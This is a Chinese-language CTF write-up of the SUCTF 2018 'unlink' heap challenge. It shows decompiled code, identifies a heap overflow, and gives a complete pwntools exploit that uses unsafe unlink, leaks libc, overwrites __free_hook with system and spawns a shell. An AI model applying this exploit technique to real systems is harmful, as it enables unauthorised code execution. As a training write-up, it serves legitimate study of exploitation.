NSSCTF/PWN - [SUCTF 2018 招新赛]unlink writeup

Posted on

首先查看程序信息:

1
2
3
4
5
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x3fe000)

使用IDA打开,main函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  init(argc, argv, envp);
  puts("welcome to note system");
  while ( 1 )
  {
    menu();
    puts("please chooice :");
    __isoc99_scanf("%d", &v4);
    switch ( v4 )
    {
      case 1:
        touch();
        break;
      case 2:
        delete();
        break;
      case 3:
        show();
        break;
      case 4:
        take_note();
        break;
      case 5:
        exit_0();
      default:
        puts("no such option");
        break;
    }
  }
}

依旧是一个很经典的菜单题。touch()中表面仅允许创建10个chunk,chunk size最大为0x200。所有chunk指针均存放在全局指针变量buf中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
unsigned __int64 touch()
{
  int v1; // [rsp+0h] [rbp-10h] BYREF
  int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  for ( i = 0; i <= 10 && (&buf)[i]; ++i )
  {
    if ( i == 10 )
    {
      puts("the node is full");
      return __readfsqword(0x28u) ^ v3;
    }
  }
  puts("please input the size : ");
  if ( v1 >= 0 && v1 <= 0x200 )
  {
    __isoc99_scanf("%d", &v1);
    (&buf)[i] = (char *)malloc(v1);
    if ( (&buf)[i] )
      puts("touch successfully");
  }
  return __readfsqword(0x28u) ^ v3;
}

delete()中将free后的指针置为了NULL,那么很难再UAF。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned __int64 delete()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("which node do you want to delete");
  __isoc99_scanf("%d", &v1);
  if ( (&buf)[v1] != 0LL && v1 >= 0 && v1 <= 9 )
  {
    free((&buf)[v1]);
    (&buf)[v1] = 0LL;
  }
  return __readfsqword(0x28u) ^ v2;
}

take_note()编辑堆块内容时存在溢出漏洞,可以以此为切入点:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned __int64 take_note()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("which one do you want modify :");
  __isoc99_scanf("%d", &v1);
  if ( (&buf)[v1] != 0LL && v1 >= 0 && v1 <= 9 )
  {
    puts("please input the content");
    read(0, (&buf)[v1], 256uLL);
  }
  return __readfsqword(0x28u) ^ v2;
}

远程服务器为Ubuntu 16.04,并且已经提示为unlink漏洞。可以利用该漏洞以及buf,修改__free_hooksystem,从而getshell。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

p = process('./service')
elf = ELF('./service')
libc = ELF(
    '/home/zsy/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')


def touch(p: process, size: int):
    p.recvuntil(b'please chooice :\n')
    p.sendline(b'1')
    p.recvuntil(b'please input the size : \n')
    p.sendline(str(size).encode("ascii"))


def delete(p: process, index: int):
    p.recvuntil(b'please chooice :\n')
    p.sendline(b'2')
    p.recvuntil(b'which node do you want to delete\n')
    p.sendline(str(index).encode("ascii"))


def show(p: process, index: int):
    p.recvuntil(b'please chooice :\n')
    p.sendline(b'3')
    p.recvuntil(b'which node do you want to show\n')
    p.sendline(str(index).encode("ascii"))
    # p.recvuntil(b'the content is : \n')


def take_note(p: process, index: int, content: bytes):
    p.recvuntil(b'please chooice :\n')
    p.sendline(b'4')
    p.recvuntil(b'which one do you want modify :\n')
    p.sendline(str(index).encode("ascii"))
    p.recvuntil(b'please input the content\n')
    p.send(content)


def exit_process(p: process):
    p.recvuntil(b'please chooice :\n')
    p.sendline(b'5')


# gdb.attach(p)

BUF = 0x6020c0

touch(p, 0x10)
touch(p, 0x200)
touch(p, 0x1f0)
touch(p, 0x1f0)

payload = b""
payload += b"a" * 0x10
payload += p64(0x20)
payload += p64(0x411)
take_note(p, 0, payload)
delete(p, 1)

take_note(p, 0, b"a" * 0x20)
show(p, 0)

# 通过chunk fd泄露libc地址,然而后续并未使用
p.recvuntil(b"a" * 0x20, drop=True)
tmp = u64(p.recvuntil(b"\x0a", drop=True).ljust(8, b"\x00"))
libc.address = tmp - 0x3c4b78
print("tmp:", hex(tmp))
print("libc.address:", hex(libc.address))

# recover the heap
take_note(p, 0, b"a" * 0x10 + p64(0) + p64(0x411))
touch(p, 0x400)
take_note(p, 0, b"a" * 0x10 + p64(0) + p64(0x211))
delete(p, 2)
delete(p, 3)

# pause()

touch(p, 0x10)
# chunk[3, 4]
touch(p, 0x20)
touch(p, 0x200)

take_note(p, 3, p64(0) + p64(0x21) + p64(BUF) +
          p64(BUF + 0x8) + p64(0x20) + p64(0x210))
delete(p, 4)
touch(p, 0x20)
touch(p, 0x20)

take_note(p, 5, b"/bin/sh\x00")
take_note(p, 3, p64(elf.got["puts"]))
show(p, 0)

p.recvuntil(b'the content is : \n')
tmp = u64(p.recvuntil(b"\x0a", drop=True).ljust(8, b"\x00"))
offset_puts = 0x000000000006f6a0
libc.address = tmp - offset_puts
print("tmp:", hex(tmp))
print("libc.address:", hex(libc.address))
take_note(p, 3, p64(libc.symbols['__free_hook']))
take_note(p, 0, p64(libc.symbols['system']))
delete(p, 5)

p.interactive()

利用结果: